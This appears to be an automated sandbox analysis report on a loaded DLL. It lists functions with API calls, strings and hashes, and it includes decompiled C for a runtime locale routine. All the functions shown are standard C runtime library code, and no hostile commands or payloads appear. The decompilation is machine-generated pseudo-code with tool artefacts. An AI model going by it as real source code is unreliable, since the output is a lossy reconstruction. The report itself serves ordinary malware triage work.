Part of subcall function 6E207005: std::locale::_Setgloballocale.LIBCPMT ref: 6E207032
Part of subcall function 6E207005: _Yarn.LIBCPMT ref: 6E207048
Part of subcall function 6E207005: std::_Lockit::~_Lockit.LIBCPMT ref: 6E207088

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
Instruction ID: 75a7b05ee0c68bce66fa10d362e75f8cb1b0a555dd5c666b178b86233fd882a4
Opcode Fuzzy Hash: 0ca6e57f01e111cddd69ffcb867a043a36f1cfd2428931c055d9b457b5bc4098
Instruction Fuzzy Hash: 77E0267AA2162E5FE31167E48511FDDE2977F80B18F62051AD2009F2C0DFF45E0047C1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D9CA, Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E24C7EF: HeapAlloc.KERNEL32(00000008,?,00000000,?,6E24D6B4,00000001,00000364,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9), ref: 6E24C830

_free.LIBCMT ref: 6E24D9EA

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Heap$AllocErrorFreeLast_free
String ID:
API String ID: 3091179305-0
Opcode ID: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction ID: 18936b1804bed6accfbdab4eaea29481b77c4ddc0e349207ec954b1b3f9f4ffe
Opcode Fuzzy Hash: c1991f024c2fcfd74ca2197f4b2dcfe4b49e5383834522ee5230ad89320bec15
Instruction Fuzzy Hash: 0AF03CB6A00719AFD314DFA9D441B9AB7F8FB48710F204566E918DB340E771AA108BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24F26D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
Instruction ID: d08f9745354f46918723af8160d69c7cec27c41a0155eabfe6afdc87fe1b7d67
Opcode Fuzzy Hash: 50c7140369a00c0af24c527298b173aa4f97eda55cf677bd71ab1aa88266d8e3
Instruction Fuzzy Hash: EDE0302A64062BDBF79996E6D814B8B7B9BAFC27A2B2516109D35971C0CB20C900C1A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E208BFE, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6E208C05

Part of subcall function 6E204A80: __EH_prolog3.LIBCMT ref: 6E204A87
Part of subcall function 6E204A80: std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
Part of subcall function 6E204A80: int.LIBCPMT ref: 6E204AA8
Part of subcall function 6E204A80: std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 1538362411-0
Opcode ID: 376522088d60b8cdb316589f37501c60103aedc8dff68d3e1d45bafc7cc282fe
Instruction ID: 6f689546e4a7e824b283625382a82eb533249dab5019e738e409e809d25728df
Opcode Fuzzy Hash: 376522088d60b8cdb316589f37501c60103aedc8dff68d3e1d45bafc7cc282fe
Instruction Fuzzy Hash: 31F0A97AA01119AFDF04EBE0C4149EDB72AFF54209F204018E9026B280DFB56F06DBA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E25E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E6E25E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e2c506c; // 0xafbb8a96
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e24e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E24D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E24D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e24e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e272f04; // 0x17
					E6E25E68F(0, " )'nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e24e03b
					E6E25E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e24e03b
						E6E25E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e24e03b
						E6E25E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e272dec; // 0x41
						_t77 = E6E25E68F(_t99, "t!\'nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E25E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E21F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E265124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E25E112(_t92, _t99,  &_v20);
						} else {
							E6E25E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}

0x6e25e6f4
0x6e25e6fb
0x6e25e702
0x6e25e702
0x6e25e706
0x6e25e70a
0x6e25e718
0x6e25e71d
0x6e25e71e
0x6e25e71f
0x6e25e720
0x6e25e725
0x6e25e728
0x6e25e72a
0x6e25e730
0x6e25e736
0x6e25e739
0x6e25e73b
0x6e25e73e
0x6e25e742
0x6e25e749
0x6e25e756
0x6e25e75b
0x6e25e75e
0x6e25e761
0x6e25e761
0x6e25e763
0x6e25e766
0x6e25e76a
0x6e25e7da
0x6e25e7dc
0x6e25e7de
0x6e25e7f1
0x6e25e7f1
0x6e25e7f8
0x6e25e7fe
0x6e25e801
0x00000000
0x6e25e801
0x6e25e7e0
0x6e25e7e3
0x00000000
0x00000000
0x6e25e7e5
0x6e25e7e9
0x6e25e7ee
0x00000000
0x6e25e771
0x6e25e771
0x6e25e775
0x6e25e787
0x6e25e78b
0x6e25e77c
0x6e25e77c
0x6e25e780
0x6e25e780
0x6e25e794
0x6e25e795
0x6e25e81f
0x6e25e81f
0x00000000
0x6e25e79b
0x6e25e79b
0x6e25e7aa
0x6e25e7af
0x6e25e7b4
0x6e25e804
0x6e25e804
0x6e25e804
0x6e25e806
0x6e25e80a
0x6e25e821
0x6e25e82d
0x6e25e837
0x6e25e83a
0x6e25e83b
0x6e25e83d
0x00000000
0x00000000
0x6e25e83f
0x6e25e845
0x00000000
0x00000000
0x6e25e847
0x6e25e84d
0x00000000
0x00000000
0x6e25e853
0x6e25e859
0x6e25e85b
0x00000000
0x00000000
0x6e25e862
0x6e25e868
0x6e25e86a
0x00000000
0x00000000
0x6e25e86c
0x6e25e86f
0x6e25e871
0x6e25e873
0x6e25e873
0x6e25e884
0x6e25e889
0x6e25e88b
0x6e25e8eb
0x6e25e80e
0x6e25e81e
0x6e25e81e
0x6e25e89a
0x6e25e8aa
0x6e25e8b0
0x6e25e8b2
0x00000000
0x00000000
0x6e25e8c9
0x6e25e8cf
0x6e25e8d1
0x00000000
0x00000000
0x6e25e8e3
0x00000000
0x6e25e8e8
0x6e25e80c
0x00000000
0x6e25e80c
0x6e25e7b6
0x6e25e7b8
0x6e25e7bc
0x6e25e7d2
0x6e25e7c3
0x6e25e7c7
0x6e25e7c7
0x6e25e7d7
0x00000000
0x6e25e7d7
0x6e25e795

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D66B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E25E7F8
IsValidCodePage.KERNEL32(00000000), ref: 6E25E853
IsValidLocale.KERNEL32(?,00000001), ref: 6E25E862
GetLocaleInfoW.KERNEL32(?,00001001,;$n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E25E8AA
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E25E8C9

Strings

t!'nE, xrefs: 6E25E7A5
)'nU, xrefs: 6E25E751
;$n, xrefs: 6E25E715, 6E25E725, 6E25E7E5, 6E25E787, 6E25E77C, 6E25E77F, 6E25E78A, 6E25E7E8
;$n, xrefs: 6E25E7CE, 6E25E821, 6E25E7C3
;$n, xrefs: 6E25E702, 6E25E8A1

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: )'nU$;$n$;$n$;$n$t!'nE
API String ID: 745075371-2121107865
Opcode ID: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
Instruction ID: 31848dbe8ed06705351c518260bf3401cceb05052acfd820eda98e982d1971bc
Opcode Fuzzy Hash: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
Instruction Fuzzy Hash: 03516D7290021FABEF50DFE5CD48ABE77BAEF05701F044569E920EB250EB709960CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E25DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E24E042,?,?,?,?,6E24DA1E,?,00000004), ref: 6E25DE78
_wcschr.LIBVCRUNTIME ref: 6E25DF08
_wcschr.LIBVCRUNTIME ref: 6E25DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9

Strings

t!'nE, xrefs: 6E25DE09
)'nU, xrefs: 6E25DDD4
B$n, xrefs: 6E25DE8F, 6E25DED7, 6E25DF7F

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )'nU$B$n$t!'nE
API String ID: 4212172061-2691769108
Opcode ID: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
Instruction ID: 2b251e721f309d78bfe7e04eb351676c9dd4c35e7766c24981b4a7f2a843bb41
Opcode Fuzzy Hash: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
Instruction Fuzzy Hash: 9D61077651420FABE7149BB5CD45BAB73AEEF05705F10086AE919DB380EB30E5618B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E258951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
_free.LIBCMT ref: 6E2589A9

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E258B75

Strings

0!'n, xrefs: 6E258964, 6E25896A
0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!'n$0!'n
API String ID: 1286116820-1210743812
Opcode ID: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
Instruction ID: d25bdfec5466c19293491472b3e610894336dc36d7c6d903214690091bb99764
Opcode Fuzzy Hash: 0e957e57a3366cc4c98d139204c32eb19a9813d234304db0f231b67da4120158
Instruction Fuzzy Hash: 1A51D77181061EEFDB48DFF9CD449AAB7BFAB41710B100A7AE411E7390D7B09A50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5DA
GetACP.KERNEL32(?,?,6E25E837,?,00000000), ref: 6E25E5EF

Strings

ACP, xrefs: 6E25E536
OCP, xrefs: 6E25E56C
7%n, xrefs: 6E25E5CF, 6E25E5A6

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: 7%n$ACP$OCP
API String ID: 2299586839-4090478770
Opcode ID: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
Instruction ID: 69987023b77f53b8312c72898458cf337b6296a8d7c1e5f85c75278e2aa7208e
Opcode Fuzzy Hash: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
Instruction Fuzzy Hash: 8821C1B261410EABE7A08FD9CB04A8777B7EB45B21B568465E91AC7308F732DD60C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E2602BC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E260402

Strings

1#INF, xrefs: 6E26160F
1#SNAN, xrefs: 6E261601
1#QNAN, xrefs: 6E261608
1#IND, xrefs: 6E2615FA

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 02aa91295ec9def43dc85f7a9f1a5728085c011abe8ae0ee34ae0d71e42766fb
Instruction ID: 57320f5e2437b0d1e4bb05d3d38a9285e5e8d5c4d69020ea0a35cc1b3ef5503f
Opcode Fuzzy Hash: 02aa91295ec9def43dc85f7a9f1a5728085c011abe8ae0ee34ae0d71e42766fb
Instruction Fuzzy Hash: 32C24A71E1862E8FDB65CEA89D40BDAB3B6EB45305F1442EAD40DE7240E774AEC58F40

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E19F, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,B0FC4CAD), ref: 6E24D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E1F3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E244
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E25E304

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: b8c41d4d6aa8561fa59fe2e57612e4cefa2c3f1a24f12513728da2eecd6f3b7e
Instruction ID: b489a2047a231e94e02b38e504c5eccfc7f92995d2226dd6523b5a0a829908c8
Opcode Fuzzy Hash: b8c41d4d6aa8561fa59fe2e57612e4cefa2c3f1a24f12513728da2eecd6f3b7e
Instruction Fuzzy Hash: 5D61027151021FEFEB588FA4CE81BBA77BAEF04305F0044BAE911C6688EB74D961CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E241F6D, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6E2075D9), ref: 6E242065
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6E2075D9), ref: 6E24206F
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,6E2075D9), ref: 6E24207C

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 289fe437f68452ac271aa0bf2d67dee772a601bd11f70958bd90cfdcfe7dcd59
Instruction ID: cd710127710b1e6eec8707e493ee5de6fd5e7d03253c9aeff4f5ce3b3a532f10
Opcode Fuzzy Hash: 289fe437f68452ac271aa0bf2d67dee772a601bd11f70958bd90cfdcfe7dcd59
Instruction Fuzzy Hash: 7631F3B591122DDBCB61DF64C888BDDBBB9BF08310F5046EAE41CA7250EB709B818F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E24966F, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E249645,?,6E2C2D28,0000000C,6E24978A,?), ref: 6E249690
TerminateProcess.KERNEL32(00000000,?,6E249645,?,6E2C2D28,0000000C,6E24978A,?), ref: 6E249697
ExitProcess.KERNEL32 ref: 6E2496A9

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

